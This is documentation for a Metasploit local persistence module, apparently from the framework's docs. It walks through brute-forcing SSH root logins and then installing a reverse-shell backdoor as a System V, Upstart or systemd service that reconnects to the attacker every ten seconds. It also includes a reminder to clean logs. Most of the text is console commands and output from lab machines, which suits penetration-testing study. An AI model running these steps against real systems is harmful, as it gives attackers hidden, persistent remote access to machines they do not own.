### Creating A Testing Environment This module has been tested against: 1. Kali 2.0 (System V) 2. Ubuntu 14.04 (Upstart) 3. Ubuntu 16.04 (systemd) 4. Ubuntu 16.04 (systemd user) 5. Centos 5 (System V) 6. Fedora 18 (systemd) 7. Fedora 20 (systemd) ## Verification Steps 1. Start msfconsole 2. Exploit a box via whatever method 3. Do: `use exploit/linux/local/service_persistence` 4. Do: `set session #` 5. Do: `set verbose true` 6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system. 7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system. 8. Do: `set lhost` 9. Do: `exploit` 10. Do: `use exploit/multi/handler` 11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system. 12. Do: `set lhost` 13. Do: `exploit -j` 14. Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec 15. Get Shell ## Options **target** There are several targets selectable, which all have their own issues. 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/.log and .err 2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever. 3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever. **BACKDOOR_PATH** If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin **SERVICE** The name of the service to create. If not chosen, a 7 character random one is created. **SHELL_NAME** The name of the file to write with our shell. If not chosen, a 5 character random one is created. ## Scenarios ### System V (Centos 5 - root - chkconfig) Get initial access msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.199.131 rhosts => 192.168.199.131 msf auxiliary(ssh_login) > set username root username => root msf auxiliary(ssh_login) > set password centos password => centos msf auxiliary(ssh_login) > exploit [*] 192.168.199.131:22 SSH - Starting bruteforce [+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux ' [*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Install our callback service (system_v w/ chkconfig). Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services. msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set BACKDOOR_PATH /bin BACKDOOR_PATH => /bin msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(service_persistence) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(service_persistence) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Writing backdoor to /bin/GUIJc [*] Max line length is 65537 [*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf [*] Utilizing System_V [*] Utilizing chkconfig [*] Writing service: /etc/init.d/HqdezBF [*] Max line length is 65537 [*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf [*] Enabling & starting our service [*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400 Reboot the box to prove persistence reboot ^Z Background session 2? [y/N] y msf exploit(service_persistence) > use exploit/multi/handler msf exploit(handler) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(handler) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Starting the payload handler... [*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400 ### Upstart (Ubuntu 14.04.4 Server - root) Of note, I allowed Root login via SSH w/ password only to gain easy initial access Get initial access msf auxiliary(ssh_login) > exploit [*] 10.10.60.175:22 SSH - Starting bruteforce [+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux ' [*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Install our callback service (Upstart) msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf exploit(service_persistence) > set lhost 10.10.60.168 lhost => 10.10.60.168 msf exploit(service_persistence) > exploit [*] Started reverse handler on 10.10.60.168:4444 [*] Writing backdoor to /usr/local/bin/bmmjv [*] Max line length is 65537 [*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf [*] Utilizing Upstart [*] Writing /etc/init/Hipnufl.conf [*] Max line length is 65537 [*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf [*] Starting service [*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log [*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400 And now, we can kill the callback shell from our previous session ^Z Background session 5? [y/N] y msf exploit(service_persistence) > sessions -i 1 [*] Starting interaction with 1... netstat -antp | grep 4444 tcp 0 0 10.10.60.175:44368 10.10.60.168:4444 ESTABLISHED 1783/bash tcp 0 0 10.10.60.175:44370 10.10.60.168:4444 ESTABLISHED 1789/python kill 1783 [*] 10.10.60.175 - Command shell session 5 closed. Reason: Died from EOFError kill 1789 Now with a multi handler, we can catch Upstart restarting the process every 10sec msf > use exploit/multi/handler msf exploit(handler) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf exploit(handler) > set lhost 10.10.60.168 lhost => 10.10.60.168 msf exploit(handler) > exploit [*] Started reverse handler on 10.10.60.168:4444 [*] Starting the payload handler... [*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400 ### systemd (Ubuntu 16.04 Server - root) Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works. While python shellcode works on previous systems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode. Get initial access msf exploit(handler) > use exploit/linux/local/service_persistence msf exploit(service_persistence) > set session 1 session => 1 msf exploit(service_persistence) > set verbose true verbose => true msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat payload => cmd/unix/reverse_netcat msf exploit(service_persistence) > set lhost 192.168.199.128 lhost => 192.168.199.128 msf exploit(service_persistence) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Writing backdoor to /usr/local/bin/JSRCF [*] Max line length is 65537 [*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf [*] Utilizing systemd [*] /lib/systemd/system/YelHpCx.service [*] Max line length is 65537 [*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf [*] Enabling service [*] Starting service [*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400 ^Z Background session 7? [y/N] y Kill the process on the Ubuntu target box via local access #good_admin root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444 tcp 0 0 192.168.199.130:47052 192.168.199.128:4444 ESTABLISHED 5632/nc root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632 And logically, we lose our shell [*] 192.168.199.130 - Command shell session 7 closed. Reason: Died from EOFError Now with a multi handler, we can catch systemd restarting the process every 10sec msf exploit(service_persistence) > use exploit/multi/handler msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.199.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse handler on 192.168.199.128:4444 [*] Starting the payload handler... [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400 ### systemd user (Ubuntu 16.04 Server - vagrant) msf5 exploit(linux/local/service_persistence) > options Module options (exploit/linux/local/service_persistence): Name Current Setting Required Description ---- --------------- -------- ----------- BACKDOOR_PATH /tmp yes Writable path to put our shell SERVICE no Name of service to create SESSION yes The session to run this module on SHELL_NAME no Name of shell file to write Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.28.128.1 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 4 systemd user msf5 exploit(linux/local/service_persistence) > run [!] SESSION may not be compatible with this module. [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Writing backdoor to /tmp/PPpCF [*] Max line length is 65537 [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf [*] Creating user service directory [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service [*] Max line length is 65537 [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf [*] Reloading manager configuration [*] Enabling service [*] Starting service: OzzdRBC [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600 id uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) uname -a Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux